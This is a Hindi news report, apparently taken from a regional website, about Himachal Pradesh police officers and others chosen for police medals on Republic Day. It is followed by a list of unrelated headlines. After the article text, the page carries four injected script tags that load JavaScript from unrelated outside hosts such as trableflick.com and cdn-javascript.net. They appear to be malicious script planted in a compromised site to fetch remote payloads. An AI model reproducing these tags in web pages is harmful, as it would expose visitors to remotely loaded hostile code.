<p>हिमाचल प्रदेश के पांच पुलिस अधिकारियों को उनकी सराहनीय सेवा के लिए पुलिस मेडल से सम्मानित किया जा रहा है। गणतंत्र दिवस के मौके पर इन अधिकारियों को सम्मानित किया जाएगा। हिमाचल प्रदेश के आईजी पुलिस दिलजीत कुमार ठाकुर को राष्ट्रपति पुलिस मेडल मिलेगा, जबकि शेष चार अधिकारियों को भी पुलिस मेडल से सम्मानित किया जा रहा है। राष्ट्रपति के हाथों इन अधिकारियों को सम्मान दिया जाएगा।</p>
<p>दिलजीत कुमार ठाकुर आईजी इंटेलिजेंस सीआईडी में तैनात हैं। यह पुरस्कार 25 साल के बाद मिलता है। जो दूसरे अधिकारी हैं, उनमें एसपी कानून एवं व्यवस्था कुशाल चंद शर्मा, एसपी किन्नौर साजू राम राणा, इंस्पेक्टर पीटीसी डरोह सुशील कुमार और सब-इंस्पेक्टर चंबा कृष्ण कुमार को सम्मानित किया जा रहा है।</p>
<p>उधर, 71वें गणतंत्र दिवस के मौके पर एसएसबी के शिमला स्थित चिकित्सा प्रशिक्षण केंद्र में तैनात कमांडेंट (चिकित्सा) डॉ. पार्था मित्रा को भी उनकी बेहतरीन सेवाओं के लिए राष्ट्रपति पुलिस मेडल से सम्मानित किया जा रहा है।इसके अलावा सुजानपुर विधानसभा क्षेत्र की ग्राम पंचायत जोल के गांव पलाही निवासी चंडीगढ़ पुलिस में सहायक उपनिरीक्षक (एएसआई) तैनात सुदेश कुमार को 32 साल की बेहतरीन और उत्कृष्ट सेवाओं के लिए राष्ट्रपति पुलिस मेडल के लिए चुना गया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1580013544828″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…
Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…
Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…
टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…
वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…
Shimla: रोहडू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…